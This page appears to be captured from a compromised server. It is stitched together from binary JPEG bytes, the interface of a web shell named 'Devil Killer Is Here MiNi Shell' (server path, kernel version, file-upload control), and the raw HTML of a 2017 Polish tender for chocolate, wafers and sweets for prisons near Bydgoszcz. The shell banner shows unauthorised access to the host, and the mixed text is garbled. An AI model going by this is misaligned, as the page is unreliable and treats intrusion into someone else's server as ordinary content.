JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/72179-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 72179 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gdańsk: znak sprawy: 5/2017/BIGB O/POTULICE<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Bałtycka Instytucja Gospodarki Budżetowej BALTICA, krajowy numer identyfikacyjny
              22115068800000, ul.
              ul. Kurkowa 
              12,
              80803  
              Gdańsk, woj.
              pomorskie, państwo
              Polska, tel.
              58 728 70 00, e-mail
              e.wierzbicka@igbbaltica.pl, faks
              58 728 70 01.
              <br />
              Adres strony internetowej (URL): <br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.igbbaltica.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: igb</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>znak sprawy: 5/2017/BIGB O/POTULICE<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1) Czekolada mleczna nadziewana różne smaki 100 g, ilość szacunkowa 15000 sztuk. CPV: 15842100-3.
2) Czekolada mleczna 100 g, ilość szacunkowa 15000 sztuk. CPV: 15842100-3.
3) Czekolada gorzka 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
4) Czekolada mleczna bakaliowa z rodzynkami i orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
5) Czekolada gorzka E.Wedel 100 g, ilość szacunkowa 7000 sztuk. CPV: 15842100-3.
6) Czekolada mleczna nadziewana E.Wedel 100 g, różne smaki, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
7) Czekolada mleczna E.Wedel 100 g, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
8) Czekolada mleczna z całymi orzechami laskowymi Alpen Gold NusseBeiser 100 g, ilość szacunkowa 8000 sztuk. CPV: 15842100-3
9) Czekolada mleczna z orzechami laskowymi Alpen Gold 90 g, ilość szacunkowa 6000 sztuk. CPV: 15842100-3.
10) Czekolada biała bourbon-wanilia Alpen Gold 90 g, ilość szacunkowa 6000 sztuk. CPV: 15842100-3.
11) Czekolada mleczna z orzechami laskowymi E.Wedel 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
12) Czekolada mleczna z rodzynkami i orzechami laskowymi  milka (Raisin&amp;Nut) 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.2. Grupa 2:
1) Baton Mars 47 g. Nugatowe nadzienie, karmel, mleczna czekolada, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
2) Baton Snickers 50 g. Nugatowe nadzienie, prażone orzeszki ziemne, karmel, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
3) Baton Lion 42 g. Nadziewany wafel z karmelem i płatkami ryżowymi w polewie kakaowej, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
4) Baton 3 Bit 41 g. Baton w czekoladzie mlecznej z nadzieniem mlecznym i herbatnikiem, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
5) Baton KitKat 40 g. Paluszek waflowy w mlecznej czekoladzie, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
6) Baton Pawełek różne smaki 45 g. Batonik z nadzieniem w mlecznej czekoladzie, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
7) Baton Twix 51 g (2x25,00 g). Ciasteczka oblane kremem i mleczną czekoladą, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
8) Baton Kinder Boueno 43 g. Dwa batony w opakowaniu, pojedynczo pakowane. Wafel pokryty mleczną czekoladą, wypełniony mleczno-orzechowym nadzieniem, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
9) Baton Bounty 57 g. Wiórki kokosowe oblane mleczną czekoladą, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
10) Wafelek kakaowy w polewie czekoladowej 30 g, ilość szacunkowa 10000 sztuk. CPV: 15842220-0.
11) Wafelek orzechowy w polewie czekoladowej 30 g, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
12) Wafelek Grześki 36 g, przekładany kremem kakaowym w czekoladzie, ilość szacunkowa 20000 sztuk. CPV: 15842220-0.
13) Wafle Familijne Jutrzenka różne smaki 180 g, ilość szacunkowa 10000 sztuk. CPV: 15842220-0.
14) Wafelek Princessa różne smaki 35-37 g przekładany kremem oblany mleczną czekoladą, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
15) Wafelek Prince Polo XXL różne smaki 50 g, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
16) Wafle teatralne w czekoladzie Kopernik 46 g, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
17) Rogal 7 Days Chipita o nadzieniu o różnych smakach 60 g, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
18) Rolada długoterminowa TAGO 200 g, różne smaki, ilość szacunkowa 4000 sztuk. CPV: 15842300-5.
19) Wafle przekładane kremem 150 g paczkowane , ilość szacunkowa 7000 sztuk. CPV: 15842220-0.

3. Grupa 3:
5) Markizy kakaowe Hit Bahlsen 220 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
6) Markizy kakaowe  500 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
7) Chałwa różne smaki  bez polewy 65 g, ilość szacunkowa 1300 sztuk. CPV: 15842300-5.
8) Cukierki Nimm2 90 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
9) Cukierki Werthers orginal 90 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
10) Landrynki-karmelki twarde miętowe 80 g, ilość szacunkowa 13000 sztuk. CPV: 15842300-5.
11) Landrynki-karmelki twarde o smaku owocowym 80 g , ilość szacunkowa 13000 sztuk. CPV: 15842300-5.
12) Krówki paczkowane 130, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
13) Jeżyki Jutrzenka różne smaki 140 g, ilość szacunkowa 3500 sztuk. CPV: 15842300-5.
14) Delicje E.Wedel różne smaki 147 g, ilość szacunkowa 7000 sztuk. CPV: 15842300-5.
15) Pieguski E.Wedel różne smaki 135 g, ilość szacunkowa 3500 sztuk. CPV: 15842300-5.
16) Krakuski florianki 143 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
17) Krakuski serduszka 143 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
18) Krakuski ciastka maślane 150 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
19) Krakuski deserowe z cukrem 150 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
20) Krakuski kokosowe 125 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
21) Biszkopty 120 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
22) Biszkopty z galaretką w polewie czekoladowej różne smaki 130 g, ilość szacunkowa 8000 sztuk. CPV: 15842300-5.
23) Herbatniki Petit Beurry 100 g, ilość szacunkowa 8000 sztuk. CPV: 15821200-1.
24) Paluszki solone 70 g  80 g, ilość szacunkowa 20000 sztuk. CPV: 15842300-5.
25) Sękacz kakaowy 32 g, ilość szacunkowa 12000 sztuk. CPV: 15842300-5.
26) Ptasie mleczko waniliowe w polewie czekoladowej E.Wedel 380 g, ilość szacunkowa 1800 sztuk. CPV: 15842300-5.
27) Ptasie mleczko waniliowe w polewie czekoladowej 500 g, ilość szacunkowa 3000 sztuk. CPV: 15842300-5.
28) Pierniki w czekoladzie 400 g , ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
29) Toffifee bombonierka 125 g. Orzech laskowy w karmelu, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
30) Napój czekoladowy instant  rozpuszczalny 300 g. CPV: 15841000-5, ilość szacunkowa 5000 sztuk.
31) Paluszki serowo-cebulowe 220 g  250 g, ilość szacunkowa 2000 sztuk, CPV:15842300-5.
32) Lizaki serduszka,6 g /100 szt / ilość szacunkowa 500 opakowań, CPV 15842300-5.
33) Lizaki Chupa-Chups, ilość szacunkowa 1500 sztuk, CPV 15842300-5.
34) Draże kokosowe, paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
35) Draże kakaowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
36) Draże śmietankowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
37) Kamyki orzechowe  kruche orzeszki arachidowe oblane kolorowym lukrem, paczkowane opakowanie o wadze 90 g  100 g, ilość szacunkowa 2500 sztuk. CPV: 15842400-6.
38) BOMBONIERKA Ferrero Raffaello  opakowanie o wadze 150 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
39) Rodzynki w czekoladzie o wadze 100 g, ilość szacunkowa 3000 sztuk. CPV: 15332412-5.
40) Drażetki Mentos o wadze 37 g  43 g, różne smaki, ilość szacunkowa 400 sztuk. CPV:15842300-5.
41) Drażetki Tic-Tak o wadze 16 g, różne smaki, ilość szacunkowa 500 sztuk. CPV:15842300-5.
42) Cukierki Raczki o wadze 120 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
43) Krakersy o wadze 170 g , ilość szacunkowa 500 sztuk. CPV: 15842300-5.
44) Rurki TAGO - opakowania luzowe 3 kg, różne smaki, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
45) Ciastka kruche z nadzieniem po środku  Słoneczniki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
46) Jogusie mix PSZCZÓŁKA  opakowanie zbiorcze 3 kg, mieszanka 4 cukierków z nadzieniem mlecznym o smakach: cytrynowym, brzoskwiniowym, malinowym i poziomkowym, ilość szacunkowa 400 sztuk. CPV: 15842300-5.
47) Michałki   opakowanie 2 kg, cukierki orzechowe oblane czekoladą, ilość szacunkowa 300 sztuk. CPV: 15842300-5.

4. Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy. Zamawiający zastrzegają sobie prawo do nieodebrania całości zamówienia, z zastrzeżeniem, że ilość dostarczonego asortymentu nie będzie mniejsza niż 70 % wielkości całego zamówienia i z tego tytułu wykonawcy nie przysługuje żadne roszczenie finansowe lub prawne.
5. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, w zamkniętych i nieuszkodzonych opakowaniach, które posiadają: kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz wadze/gramaturze lub ilości j.m. (np. sztuk) w opakowaniu.
6. Termin ważności dostarczanych artykułów - minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
7. Zamawiający dopuszcza możliwość dostaw artykułów w opakowaniu o większej gramaturze lub ilości sztuk w opakowaniu (tzw. promocja) niż określone w siwz w rozdziale III (dotyczy tylko w okresie realizacji zamówienia na podstawie umowy).
8. Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry tj. gramaturę lub pojemność, albo ilość sztuk w opakowaniu taką samą jak opisany przez zamawiającego dany przedmiot zamówienia. W przypadku, kiedy przedmiot zamówienia został przez zamawiającego opisany za pomocą przedstawienia jego składu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada takie same składniki jakie w opisie przedmiotu zamówienia zawarł zamawiający. Jeżeli opis przedmiotu zamówienia oprócz składu posiada również opis procentowego (%) udziału danego składnika w składzie artykułu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada te same składniki, a udział procentowy (%) poszczególnych składników nie może być większy lub mniejszy niż 10% od opisanego przez zamawiającego procentowego (%) udziału danego składnika w składzie artykułu. Ponadto inne parametry produktu równoważnego oferowanego przez wykonawcę, w szczególności dotyczące smaku, aromatu, koloru, konsystencji nie mogą znacząco różnić się od artykułu opisanego przez zamawiającego. Na wykonawcy ciąży udowodnienie, że produkt równoważny spełnia wymogi i opis określony przez zamawiającego. W przypadku oferowania produktów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 4 do siwz, tj. formularz dotyczący porównania parametrów artykułów
9. Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 ustawy Pzp.
10. Zamawiający  dopuszcza możliwości składania ofert częściowych.
11. Zamawiający nie dopuszcza możliwości składania ofert wariantowych .
12. Miejsce, sposób, terminy dostaw oraz forma i termin płatności:
13. Wykonawca dostarczać będzie ww. artykuły na swój koszt, zgodnie z wymogami sanitarnymi w sposób zapobiegający utracie walorów smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a. Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1;
b. Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4;
c. Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8;
d. Zakładu Karnego w Koronowie, ul. Bydgoska 27;
e. Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4;
f. Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22;
g. Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17;
h. Zakładu Karnego w Inowrocławiu, ul. Gabriela Narutowicza 46;
i. Aresztu Śledczego w Toruniu, ul. Piekary 53;
j. Zakładu Karnego we Włocławku, ul. Bartnicka 10;
k. Oddziału Zewnętrznego Aresztu Śledczego w Bydgoszczy, ul. Toruńska 276;
l. Kawiarni ODK Zacisze, 89-526 Lubiewo;
m. Oddziału Zewnętrznego w Czersku, ul. Dworcowa 29, Czersk;
n. Oddziału Zewnętrznego w Strzelewie, gm. Sicienko.
                  Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.Termin płatności: 30 dni, forma płatności: przelew.<br /><br /><b>II.5) Główny kod CPV: </b>15894000-1<br /><b> Dodatkowe kody CPV:</b>15842100-1,
                15851250-5,
                15842220-0,
                15842300-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Określenie warunków: Określenie warunków: Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: nie Informacje dodatkowe: Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: nie Informacje dodatkowe: 
Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: nie <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
